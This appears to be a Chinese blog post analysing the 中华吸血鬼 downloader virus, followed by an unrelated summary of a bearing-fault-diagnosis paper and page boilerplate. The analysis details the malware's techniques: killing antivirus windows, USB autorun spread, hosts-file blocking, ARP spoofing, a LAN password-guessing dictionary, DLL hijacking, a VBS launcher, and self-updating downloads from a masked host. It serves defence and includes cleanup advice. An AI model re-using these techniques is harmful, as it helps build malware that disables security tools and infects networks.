中华吸血鬼分析

这是一个具有多种传播功能和反杀毒软件功能的下载者病毒,传播方式新颖独特,需要严密防范! 下面是该病毒的详细分析报告: 病毒初始化过程: 1.创建一个互斥量:中华吸血鬼2.2 2.删除SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK} 3.释放如下副本或文件: %systemroot%\Tasks\绿化.bat %systemroot%\Tasks\csrss.exe %systemroot%\Tasks\wsock32.dll 4.之后创建很多线程,执行多种病毒功能: (1)通过GetWindowTextA函数获得窗口标题,并比较是否含有如下字样 worm 卡巴斯基 江民 金山 Anti anti Virus virus Firewall Mcafee 查杀 主动防御 微点 系统保护 主 动 主动 杀马 木马 上报 举 报 举报 进 程 进程 系统安全 Process NOD32 专 杀 专 杀 专杀 安全卫士 绿鹰 ... 如果含有则使用PostMessage函数会发送消息给他们: 首先发送一个WM_Destroy,之后发送两个WM_Close 最后发一个WM_Destroy 的消息。并把窗口标题名保存下来。 之后会调用Messageboxa函数弹出一个标题为"Windows盗版验证为"的窗口 并显示如下字样“安全提示:您正在使用的(刚刚获得的窗口标题名称)是盗版软件,可能您是盗版软件的受害者,为了给合法用户提供保证,我们无法继续给您提供服务,请到指定销售商购买我们的正版软件,如果有任何疑问,请到我们微软主页查看http://www.microsoft.com” (2) 破坏冰刃 查找类名为Afxcontrolbar423s的窗口 然后发送WM_Close关闭 再模拟键盘输入按一下回车键 (3) U盘传播功能 检测可移动存储中是否有autorun.inf文件,如果有将其改名 之后向里面写入autorun.inf 创建recycle.{645FF040-5081-101B-9F08-00AA002F954E}文件夹,在该文件夹内写入GHOSTBAK.exe(病毒文件) (4) 病毒感染统计 搜集被感染主机的mac地址,并把被感染主机的mac地址和感染的病毒版本发送给http://www.*******.cn/tj/ct.asp页面 (5) 修改hosts文件 获得%programfiles%的环境变量,接着查找[url=file://drivers/etc//hosts]\\drivers\etc\\hosts[/url]文件 写入如下数据: 127.0.0.0 360.qihoo.com 127.0.0.1 qihoo.com 127.0.0.1www.qihoo.com 127.0.0.1www.qihoo.cn 127.0.0.1 124.40.51.17 127.0.0.1 58.17.236.92 127.0.0.1www.kaspersky.com 127.0.0.1 60.210.176.251 127.0.0.1www.cnnod32.cn 127.0.0.1www.lanniao.org 127.0.0.1www.nod32club.com 127.0.0.1www.dswlab.com 127.0.0.1 bbs.sucop.com 127.0.0.1www.virustotal.com 127.0.0.1 tool.ikaka.com 127.0.0.1www.jiangmin.com 127.0.0.1www.duba.net 127.0.0.1www.eset.com.cn 127.0.0.1www.nod32.com 127.0.0.1 shadu.duba.net 127.0.0.1 union.kingsoft.com 127.0.0.1www.kaspersky.com.cn 127.0.0.1 kaspersky.com.cn 127.0.0.1 virustotal.com 127.0.0.1www.360.cn 127.0.0.1www.360safe.cn 127.0.0.1www.360safe.com 127.0.0.1www.chinakv.com 127.0.0.1www.rising.com.cn 127.0.0.1 rising.com.cn 127.0.0.1 dl.jiangmin.com 127.0.0.1 jiangmin.com 每1秒循环一次 (6) 遍历进程,调用Terminate Process函数结束如下进程: AST.exe 360tray.exe ast.exe FWMon.exe (7) 遍历磁盘文件删除扩展名为gho,GHO,Gho的文件 (8) arp欺骗功能 获取本机IP地址 然后把所在同网段内的.2~.255的机器作为欺骗对象 由系统目录下的arps.com执行%s -idx 0 -ip %s -port 80 -insert \"%s的命令 对局域网内机器进行arp欺骗 (9) 局域网弱密码猜解传播 以administrator为用户名,对局域网中其他机器进行密码猜解。如果成功则复制到对方机器的共享的C,D,E,F盘中,以hackshen.exe 病毒猜解的密码字典如下: woaini baby asdf NULL angel asdfgh 1314520 5201314 caonima 88888 bbbbbb 12345678 memory abc123 qwerty 123456 password enter hack xpuser money yeah time game user home alex guest admin test administrator movie root love (10)删除HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings键 释放一个hackchen.vbs到%systemroot%\Tasks hackchen.vbs内容: On Error Resume Next Set rs=createObject("Wscript.shell") rs.run "%windir%\Tasks\csrss.exe",0 并且注册HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK} 指向%systemroot%\Tasks\hackchen.vbs (11) 病毒自动更新功能。在系统目录下释放meupdate.ini文件,并且和http://www.*******.cn/22.txt做比较,如果不同则下载http://www.*******.cn/server.exe(最新版病毒程序)到c:\_default.pif,并且每600ms执行一次 (12)通过查找%ProgramFiles%的环境变量获得程序文件夹路径,之后查找[url=file://winrar//Rar.exe]\\WinRAR\\Rar.exe[/url]获得winrar安装路径。 遍历所有分区的.rar,.zip,.tgz,.cab,.tar文件 找到后 后台调用winrar执行"(winrar路径)" -ep a "(找到的rar等文件路径)" %systemroot%\Tasks\绿化.bat 命令 将绿化.bat压缩进压缩包,绿化.bat即为病毒本身,诱使用户点击中毒。 (13)(此方法十分新颖) 遍历所有文件夹并且将%systemroot%\Tasks\wsock32.dll 复制到每个文件夹下 当该文件夹下的exe文件的导入表含有wsock32.dll的时候,会首先调用同文件夹下的wsock32.dll,也就是病毒释放的文件。此时会从下载http://www.*******.cn/server.exe(病毒最新版本)并执行!!! (14) 查找某些类名为#32770的窗口,并且试图发送"我做了快一个月了,每天2个小时有40-50元的收入,你也来看看吧,长期大量招聘http://www.*******.cn/jianzhi.htm"的消息给对方(应该是通过QQ之类的聊天工具传播) (15) 遍历非系统分区的html,aspx,htm等文件 写入iframe代码 (16)下载木马功能 下载http://www.*******.cn/ft/qq.exe http://www.*******.cn/cj/qq.exe 并执行 清除方法不作赘述,安全模式下清理所有文件夹下的wsock32.dll, 并利用工具清理%systemroot%\Tasks\绿化.bat %systemroot%\Tasks\csrss.exe 并打开所有压缩包文件 删除里面的绿化.bat。 最后使用杀毒软件全盘杀毒 这也是一个浩大的工程吧~~ 综观此病毒有很多新颖之处,首先是在关闭杀软之后弹出窗口,容易给不知情者以迷惑;其次病毒释放的wsock32.dll会使得任意该目录下的exe文件成为下载病毒文件的傀儡;再次由于windows的某些保护,tasks目录下的文件无法直接看到,这又给病毒了一个绝佳的藏身之地;最后,病毒还会将自己压缩到压缩包中,起一个诱惑的名字诱使用户再次中毒。 最近恶性病毒以及木马群肆虐,但此类行为特征新颖的病毒也有所猖獗,望大家做好防范!

内容概要:本文提出了一种基于融合鱼鹰算法和柯西变异的改进麻雀优化算法(OCSSA),用于优化变分模态分解(VMD)的参数,进而结合卷积神经网络(CNN)与双向长短期记忆网络(BiLSTM)构建OCSSA-VMD-CNN-BILSTM模型,实现对轴承故障的高【轴承故障诊断】基于融合鱼鹰和柯西变异的麻雀优化算法OCSSA-VMD-CNN-BILSTM轴承诊断研究【西储大学数据】(Matlab代码实现)精度诊断。研究采用西储大学公开的轴承故障数据集进行实验验证,通过优化VMD的模态数和惩罚因子,有效提升了信号分解的准确性与稳定性,随后利用CNN提取故障特征,BiLSTM捕捉时间序列的深层依赖关系,最终实现故障类型的智能识别。该方法在提升故障诊断精度与鲁棒性方面表现出优越性能。; 适合人群:具备一定信号处理、机器学习基础,从事机械故障诊断、智能运维、工业大数据分析等相关领域的研究生、科研人员及工程技术人员。; 使用场景及目标:①解决传统VMD参数依赖人工经验选取的问题,实现参数自适应优化;②提升复杂工况下滚动轴承早期故障的识别准确率;③为智能制造与预测性维护提供可靠的技术支持。; 阅读建议:建议读者结合Matlab代码实现过程,深入理解OCSSA优化机制、VMD信号分解流程以及CNN-BiLSTM网络架构的设计逻辑,重点关注参数优化与故障分类的联动关系,并可通过更换数据集进一步验证模型泛化能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值